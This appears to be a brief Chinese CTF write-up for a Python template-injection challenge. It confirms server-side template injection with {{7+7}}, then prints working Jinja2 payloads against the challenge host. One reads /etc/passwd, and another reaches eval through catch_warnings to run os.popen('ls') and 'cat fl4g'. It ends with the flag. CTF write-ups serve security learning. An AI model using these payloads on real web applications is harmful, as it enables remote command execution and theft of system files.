Web_python_template_injection

打开网页提示我们python模板注入

首先进行测试：

http://220.249.52.133:30503/{{7+7}}

提示我们"URL http://220.249.52.133:30503/14 not found"，说明7+7被执行

我们可以用http://220.249.52.133:30503/{{config.items()}}查看服务器的配置信息，还可用http://220.249.52.133:30503/{{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}查看passwd信息

我们执行http://220.249.52.133:30503/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{b['eval']('__import__("os").popen("ls").read()')}}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}，得知存在fl4g文件

所以http://220.249.52.133:30503/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{b['eval']('__import__("os").popen("cat fl4g").read()')}}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}获得flag

ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

标签：__,Web,.__,http,python,__.__,injection,class,220.249
来源： https://www.cnblogs.com/hktk1643/p/14102460.html